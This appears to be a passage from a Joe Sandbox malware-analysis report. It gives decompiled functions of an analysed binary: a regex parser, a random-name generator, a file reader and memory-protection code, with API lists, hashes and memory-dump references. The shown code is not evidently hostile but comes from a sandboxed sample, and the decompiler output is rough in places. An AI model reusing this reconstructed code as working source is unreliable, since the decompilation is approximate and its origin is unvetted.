							__eflags = _t273;
							__ecx = __ecx & 0xffffff00 | _t273;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L44;
						case 9:
							goto L18;
						case 0xa:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E0040811C();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0xb:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E004081D0();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0xc:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E00408154();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0xd:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E00408208();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0xe:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E004080D8();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0xf:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							__eax = E0040818C();
							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x10:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push( &(__esi[4]));
							__eax = E00409B68(__eflags,  *__edi);
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x11:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push( &(__esi[4]));
							__eax = E00409B87(__eflags,  *__edi);
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x12:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push( &(__esi[4]));
							__eax = E00409BA6(__eflags,  *__edi);
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x13:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push( &(__esi[4]));
							_push( *__edi);
							_push(1);
							__eax = E00409A43();
							__esp = __esp + 0xc;
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x14:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push( &(__esi[4]));
							_push( *__edi);
							_push(0);
							__eax = E00409A43();
							__esp = __esp + 0xc;
							 *(__ebp - 0x10) = __eax;
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x15:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push(__ecx);
							_push( *__edi);
							__eax = E00409A9D(__ecx, __eflags);
							_pop(__ecx);
							 *(__ebp - 0x10) = __eax;
							_pop(__ecx);
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							goto L95;
						case 0x16:
							__eax =  *__edi;
							__ecx =  &(__esi[4]);
							_push(__ecx);
							_push( *__edi);
							__eax = E00409AD6(__ecx, __eflags);
							_pop(__ecx);
							 *(__ebp - 0x10) = __eax;
							_pop(__ecx);
							__eflags = __eax;
							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
							__eax = __ebp - 0x14;
							 *(__ebp - 0x14) = __cl;
							__ecx = __ebp - 0x24;
							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
							__ecx = __ebp - 0x14;
							L95:
							__eax = E00406ED3(__ecx);
							goto L18;
						case 0x17:
							__eax =  *__ebx;
							 *(__ebp - 0x28) = __eax;
							 *(__ebp + 0x10) = __eax;
							while(1) {
								__ecx = __esi[0x27];
								 *(__ebp + 8) = __esi[0x27];
								__eax =  *0x41720c();
								__eax =  *(__ebp + 8);
								__ecx =  *(__eax + 4);
								__eax =  *(__eax + 8);
								__edx = __ecx;
								__eax = __eax + __ecx;
								__edx =  ~__ecx;
								asm("sbb edx, edx");
								__edx =  ~__ecx & __eax;
								__eflags = ( ~__ecx & __eax) -  *__ebx;
								if(( ~__ecx & __eax) ==  *__ebx) {
									break;
								}
								__ecx = __esi[0x27];
								 *(__ebp + 8) = __esi[0x27];
								__eax =  *0x41720c();
								__eax =  *(__ebp + 8);
								__ecx =  *(__eax + 4);
								__eax =  *(__eax + 8);
								__edx = __ecx;
								__eax = __eax + __ecx;
								__edx =  ~__ecx;
								asm("sbb edx, edx");
								__ecx = __edi;
								__eax = E00406B23(__ecx, __ebx, __edx);
								__eflags = __eax;
								if(__eax == 0) {
									__ecx = __esi[0x27];
									 *(__ebp + 8) = __esi[0x27];
									__eax =  *0x41720c();
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									__eax =  *(__eax + 8);
									__edx = __ecx;
									__eax = __eax + __ecx;
									__edx =  ~__ecx;
									asm("sbb edx, edx");
									__edx =  ~__ecx & __eax;
									__eax =  *__ebx;
									__eflags = __edx - __eax;
									if(__edx != __eax) {
										__eax = __eax + 1;
										__eflags = __eax;
										 *__ebx = __eax;
									}
									L106:
									__eax =  *__ebx;
									 *(__ebp - 0x28) =  *__ebx;
									continue;
								}
								__eflags = __eax - 0x21;
								if(__eax == 0x21) {
									break;
								}
								goto L106;
							}
							__eax =  *(__ebp - 0x28);
							__eflags = __eax -  *(__ebp + 0x10);
							if(__eax !=  *(__ebp + 0x10)) {
								__edi =  *__edi;
								_push(__esi);
								_push(__edi);
								_push(__eax);
								_push( *(__ebp + 0x10));
								__eax = E0040A5B8();
								__ecx =  *(__ebp + 0xc);
								__esp = __esp + 0x10;
								__edx =  *(__ecx + 0x1c);
								 *( *(__ecx + 0x1c)) = __eax;
								 *(__ecx + 0x1c) = __eax;
							}
							goto L20;
						case 0x18:
							__al =  *((intOrPtr*)(__ebp + 0xf));
							_push(0);
							__ecx = __ebp - 0x74;
							 *(__ebp - 0x74) =  *((intOrPtr*)(__ebp + 0xf));
							__eax =  *0x417230();
							__esi = "quotemeta turned off, but was never turned on";
							_push(__esi);
							L004153D6();
							_pop(__ecx);
							_push(__eax);
							_push(__esi);
							__ecx = __ebp - 0x74;
							 *0x417234() = __ebp - 0x74;
							__ecx = __ebp - 0xf0;
							 *((char*)(__ebp - 4)) = 7;
							__eax = E00404FA7(__ebp - 0xf0, __ebp - 0x74);
							 *((intOrPtr*)(__ebp - 0xef7b)) =  *((intOrPtr*)(__ebp - 0xef7b)) - 1;
							goto [far dword [eax-0x8];
					}
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(_t568 + 0xc)) + 0x10)) != 0) {
						 *((char*)(_t568 - 0x1c)) =  *((intOrPtr*)(_t568 + 0xf));
						 *0x417230(0);
						_t567 = "mismatched parenthesis";
						 *0x417234(_t567, strlen(_t567));
						 *(_t568 - 4) = 2;
						E00404FA7(_t568 - 0x80, _t568 - 0x1c);
						_push(0x4196f8);
						_push(_t568 - 0x80);
						 *((intOrPtr*)(_t568 - 0x80)) = 0x417698;
						L004153FE();
					}
					 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
					E0040C5ED(_t568 - 0x30);
					 *(_t568 - 4) =  *(_t568 - 4) | 0xffffffff;
					E00406ED3(_t568 - 0x24);
					_t487 = 0;
					L21:
					 *[fs:0x0] =  *((intOrPtr*)(_t568 - 0xc));
					return _t487;
				}
			}

APIs

_EH_prolog.MSVCRT ref: 004050BD
strlen.MSVCRT ref: 0040513C
_CxxThrowException.MSVCRT(?,004196F8), ref: 0040516D
strlen.MSVCRT ref: 0040520C
_CxxThrowException.MSVCRT(00417698,004196F8), ref: 00405246
strlen.MSVCRT ref: 00405280

Strings

mismatched parenthesis, xrefs: 00405136, 0040513B, 00405143, 00405206, 0040520B, 00405213, 0040527A, 0040527F, 00405287

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: strlen$ExceptionThrow$H_prolog
String ID: mismatched parenthesis
API String ID: 1639010532-3804012542
Opcode ID: d6babdc1cd365e2e1e8502f498082d8db2161f20e5f97c3c9e293608a4966727
Instruction ID: dbdd704d0f857427ebeb39f116f656dece123dea06476c1553e1f9c4206b7acd
Opcode Fuzzy Hash: d6babdc1cd365e2e1e8502f498082d8db2161f20e5f97c3c9e293608a4966727
Instruction Fuzzy Hash: 1CD18F75905209DFCB04DFA4C995AEEBBB4EF44304F1080AEE816B7281DB78AE05CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00414977 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041497C
strlen.MSVCRT ref: 004149A8
_CxxThrowException.MSVCRT(?,004196F8), ref: 004149DA
toupper.MSVCRT ref: 004149FF
tolower.MSVCRT ref: 00414A21

Strings

invalid range specified in character set, xrefs: 004149A2, 004149A7, 004149AF

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlentolowertoupper
String ID: invalid range specified in character set
API String ID: 1623458934-400550818
Opcode ID: d408190d57219a03c27e133eefc1f35bfc50e08c6d9d172808e4cf878ccc8899
Instruction ID: 8689beaf87658f235b18adbd55520a84ac800dc3010e3d19cb195d65f9f5d29c
Opcode Fuzzy Hash: d408190d57219a03c27e133eefc1f35bfc50e08c6d9d172808e4cf878ccc8899
Instruction Fuzzy Hash: A2313972540115AFCB04DF64D8916FD7BB4EF44361F10806FF966CA181C7B89A85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC3E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040BC43
strlen.MSVCRT ref: 0040BC6F
_CxxThrowException.MSVCRT(?,004196F8), ref: 0040BCA1
toupper.MSVCRT ref: 0040BCC6
tolower.MSVCRT ref: 0040BCE8

Strings

invalid range specified in character set, xrefs: 0040BC69, 0040BC6E, 0040BC76

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlentolowertoupper
String ID: invalid range specified in character set
API String ID: 1623458934-400550818
Opcode ID: 0e24881944c7c0c498e365fc8964e77618a0ccef3bb12c5c82b08ac14b24d4ad
Instruction ID: cd9e26891659f9ba17b876740d84c57d5df747751494f0963a811352e82b1091
Opcode Fuzzy Hash: 0e24881944c7c0c498e365fc8964e77618a0ccef3bb12c5c82b08ac14b24d4ad
Instruction Fuzzy Hash: 9E311432500155AFDB08DF64D8917FDBBB4EF44350F10806BF566DA1C1DBB89A85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040199E Relevance: 9.1, APIs: 6, Instructions: 61
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040199E(void* __ecx) {
				struct HMENU__* _t19;
				void* _t22;
				struct HMENU__* _t27;
				void* _t41;
				void* _t43;

				L004153D0();
				_push(__ecx);
				_t41 = __ecx;
				L00415232();
				_t19 = GetSystemMenu( *(__ecx + 0x20), 0);
				_push(_t19);
				L00415304();
				_t27 = _t19;
				if(_t27 != 0) {
					L004152EC();
					_push(0x65);
					 *(_t43 - 4) = 0;
					L004152FE();
					if( *((intOrPtr*)( *(_t43 - 0x10) - 8)) != 0) {
						AppendMenuA( *(_t27 + 4), 0x800, 0, 0);
						AppendMenuA( *(_t27 + 4), 0, 0x10,  *(_t43 - 0x10));
					}
					 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
					L00415214();
				}
				SendMessageA( *(_t41 + 0x20), 0x80, 1,  *(_t41 + 0x80));
				SendMessageA( *(_t41 + 0x20), 0x80, 0,  *(_t41 + 0x80));
				_t22 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t22;
			}

APIs

_EH_prolog.MSVCRT ref: 004019A3
GetSystemMenu.USER32(?,00000000), ref: 004019B9
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 004019F8
AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401A04
SendMessageA.USER32(?,00000080,00000001,?), ref: 00401A2E
SendMessageA.USER32(?,00000080,00000000,?), ref: 00401A3C

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: Menu$AppendMessageSend$H_prologSystem
String ID:
API String ID: 2469542211-0
Opcode ID: b776af5b621d7cd78022760181e20f7924a719f0e5e1bcefeefb39d5102cff14
Instruction ID: 5be617b225bb215d29ef40c61bba07445f241ab3afedab8fc5c110dbd8f57498
Opcode Fuzzy Hash: b776af5b621d7cd78022760181e20f7924a719f0e5e1bcefeefb39d5102cff14
Instruction Fuzzy Hash: FD11B232640604EBDB21ABA1CC81FDEBB71FF84B00F10452AF555660E1DBB56840DF18

Uniqueness

Uniqueness Score: -1.00%

Function 0040107C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040107C(intOrPtr _a4, signed int _a8) {
				void _v32;
				signed int _t19;
				signed int _t22;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t39;
				void* _t40;

				_t26 = 6;
				memcpy( &_v32, "ekimhuqcroanflvzgdjtxypswb", _t26 << 2);
				asm("movsw");
				asm("movsb");
				srand(GetTickCount());
				_t19 = rand();
				asm("cdq");
				_t29 = 0xa;
				_t25 = _t19 % _t29;
				if(_t25 < _a8) {
					_t25 = _a8;
				}
				_t39 = 0;
				if(_t25 > 0) {
					do {
						_t22 = rand();
						asm("cdq");
						_t30 = 0x1a;
						 *((char*)(_t39 + _a4)) =  *((intOrPtr*)(_t40 + _t22 % _t30 - 0x1c));
						_t39 = _t39 + 1;
					} while (_t39 < _t25);
				}
				return _t25;
			}

APIs

GetTickCount.KERNEL32 ref: 00401095
srand.MSVCRT ref: 0040109C
rand.MSVCRT ref: 004010A9
rand.MSVCRT ref: 004010C1

Strings

ekimhuqcroanflvzgdjtxypswb, xrefs: 00401088

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: rand$CountTicksrand
String ID: ekimhuqcroanflvzgdjtxypswb
API String ID: 3923125369-3762667353
Opcode ID: b82129336e1194dd03dfb6d02705f8909e6a668a9130fe837ce4919de25d8751
Instruction ID: 6e7471b6b191c25231bb1943ac2c278cbb6d4f2c92849cbbbbe3a5302c238a81
Opcode Fuzzy Hash: b82129336e1194dd03dfb6d02705f8909e6a668a9130fe837ce4919de25d8751
Instruction Fuzzy Hash: 93F04C337043449BC720BF5A6CC4D9BBFA99B89720F01807AFD4067381C5B5944386B5

Uniqueness

Uniqueness Score: -1.00%

Function 00414FFF Relevance: 7.6, APIs: 5, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00414FFF(void* __ecx, void* __eflags) {
				long _v8;
				long _v12;
				struct _MEMORY_BASIC_INFORMATION _v40;
				struct _SYSTEM_INFO _v76;
				void* _v88;
				void* _t11;
				int _t15;
				long _t17;
				void* _t18;
				void* _t25;
				void* _t34;
				void* _t37;
				void* _t41;
				void* _t42;

				_t11 = 4;
				E00415390(_t11, __ecx);
				_t34 = _t42;
				if(VirtualQuery(_t34,  &_v40, 0x1c) == 0) {
					L2:
					_t15 = 0;
				} else {
					_t37 = _v40.AllocationBase;
					GetSystemInfo( &_v76);
					_t17 = _v76.dwPageSize;
					_v8 = _t17;
					_t41 = ( !(_t17 - 1) & _t34) - _t17;
					_t18 = E004150B3();
					asm("sbb eax, eax");
					if(_t41 >= ( ~(_t18 - 1) & 0x00001000) + 0x11000 + _t37) {
						if(E004150B3() != 1) {
							if(_t41 > _t37) {
								VirtualFree(_t37, _t41 - _t37, 0x4000);
							}
							VirtualAlloc(_t41, _v8, 0x1000, 4);
						}
						_t25 = E004150B3();
						asm("sbb eax, eax");
						_t15 = VirtualProtect(_t41, _v8, ( ~(_t25 - 1) & 0x00000103) + 1,  &_v12);
					} else {
						goto L2;
					}
				}
				return _t15;
			}

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00415019
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0041502A

Part of subcall function 004150B3: GetVersionExA.KERNEL32(?), ref: 004150E4

VirtualFree.KERNEL32(?,?,00004000,?,?,0000001C), ref: 00415075
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00415086
VirtualProtect.KERNEL32(?,?,00000000,?,?,?,0000001C), ref: 004150A5

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: Virtual$AllocFreeInfoProtectQuerySystemVersion
String ID:
API String ID: 2795766573-0
Opcode ID: 834cf1a71c9c5ed003860edc690bd353255b54ad79c9a6b5e54ee2e945d25065
Instruction ID: 6d54ece17a00f09206e5511fc7c9e2413ccf1818c2fd634c5d4940529b78a55d
Opcode Fuzzy Hash: 834cf1a71c9c5ed003860edc690bd353255b54ad79c9a6b5e54ee2e945d25065
Instruction Fuzzy Hash: 61110B76A50A09EADB1167F0DD49FEF7F78EB4D385F100121FA01E3180D5389A4586D9

Uniqueness

Uniqueness Score: -1.00%

Function 004010DF Relevance: 7.6, APIs: 5, Instructions: 67
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004010DF(void* __ecx, void* __eflags, intOrPtr _a4, long _a8, intOrPtr* _a12) {
				void* _v8;
				void _v4103;
				void _v4104;
				void* _t22;
				void* _t29;
				intOrPtr* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				E00415390(0x1004, __ecx);
				_v4104 = 0;
				memset( &_v4103, 0, 0x3ff << 2);
				_t47 = _t46 + 0xc;
				asm("stosw");
				asm("stosb");
				_t22 = CreateFileA(_a8, 0x80000000, 0, 0, 3, 0x80, 0);
				_v8 = _t22;
				if(_t22 != 0xffffffff) {
					_t42 = _a12;
					while(1) {
						_a8 = 0;
						memset( &_v4104, 0, 0x1000);
						_t48 = _t47 + 0xc;
						ReadFile(_v8,  &_v4104, 0x1000,  &_a8, 0);
						if(_a8 == 0) {
							break;
						}
						memcpy( *_t42 + _a4,  &_v4104, _a8);
						_t47 = _t48 + 0xc;
						 *_t42 =  *_t42 + _a8;
					}
					CloseHandle(_v8);
					_t29 = 1;
					return _t29;
				}
				return 0;
			}

APIs

CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040111A
memset.MSVCRT ref: 00401141
ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401159
memcpy.MSVCRT ref: 00401174
CloseHandle.KERNEL32(?), ref: 00401186

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: File$CloseCreateHandleReadmemcpymemset
String ID:
API String ID: 3052882905-0
Opcode ID: 35d4516e9bf1672e33f3e385a2aa10f55f2dedffe401836ef089bc25eef59cc4
Instruction ID: b3c3ea1559986d33b90c3f3678d17a695d6118acee8a61d0ddd5dd874004b1bb
Opcode Fuzzy Hash: 35d4516e9bf1672e33f3e385a2aa10f55f2dedffe401836ef089bc25eef59cc4
Instruction Fuzzy Hash: 7C117F72900249BFDB128F58DC81BDA77ACEB08365F108076FB19E6190D2749B548B68

Uniqueness

Uniqueness Score: -1.00%

Function 00405730 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 497
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00405730(intOrPtr* __ebx, signed int* __edi, char* __esi) {
				intOrPtr* _t197;
				intOrPtr _t202;
				intOrPtr _t211;
				intOrPtr _t212;
				intOrPtr _t217;
				intOrPtr _t223;
				intOrPtr _t228;
				intOrPtr _t233;
				intOrPtr _t238;
				intOrPtr _t243;
				signed char _t250;
				intOrPtr _t252;
				intOrPtr* _t268;
				intOrPtr _t270;
				intOrPtr _t273;
				void* _t274;
				intOrPtr _t278;
				void* _t286;
				intOrPtr* _t291;
				intOrPtr _t293;
				intOrPtr _t297;
				intOrPtr* _t302;
				intOrPtr _t306;
				signed int _t309;
				void* _t312;
				intOrPtr _t317;
				signed int _t319;
				signed int _t322;
				void* _t325;
				signed int _t326;
				signed int _t329;
				signed int _t332;
				signed int _t335;
				signed int _t338;
				intOrPtr* _t343;
				signed int _t345;
				signed int _t354;
				signed int _t360;
				signed int _t368;
				intOrPtr _t371;
				signed int _t372;
				signed int* _t399;
				char* _t401;
				void* _t403;

				_t401 = __esi;
				_t399 = __edi;
				_t302 = __ebx;
				 *(_t403 + 8) = __esi[0x27];
				 *0x41720c();
				asm("sbb edx, edx");
				_t197 =  *__ebx;
				if(( ~( *( *(_t403 + 8) + 4)) &  *((intOrPtr*)( *(_t403 + 8) + 8)) +  *( *(_t403 + 8) + 4)) != _t197) {
					_t306 =  *_t197;
					if(_t306 < 0x30 || _t306 > 0x39) {
						if(_t306 != 0x65) {
							if(_t306 != 0x78) {
								if(_t306 != 0x63) {
									if(_t306 != 0x61 ||  *(_t403 + 0x13) == 0) {
										if(_t306 != 0x66 ||  *(_t403 + 0x13) == 0) {
											if(_t306 != 0x6e ||  *(_t403 + 0x13) == 0) {
												if(_t306 != 0x72 ||  *(_t403 + 0x13) == 0) {
													if(_t306 != 0x74 ||  *(_t403 + 0x13) == 0) {
														if(_t306 != 0x5c ||  *(_t403 + 0x13) == 0) {
															_push(_t399);
															_push(_t306);
															if(E00409CBB() == 0) {
																_t309 =  &(_t401[4]);
																_t202 = E00409BC5(_t401,  *((intOrPtr*)( *_t302)),  *_t399, _t309);
																 *((intOrPtr*)(_t403 - 0x10)) = _t202;
																 *((char*)(_t403 - 0x14)) = _t309 & 0xffffff00 | _t202 != 0x00000000;
																E0040BF91(_t403 - 0x24, _t403 - 0x14);
																_t312 = _t403 - 0x14;
															} else {
																_t319 =  *_t399;
																_t212 = E00409B0F(_t198, _t319,  &(_t401[4]));
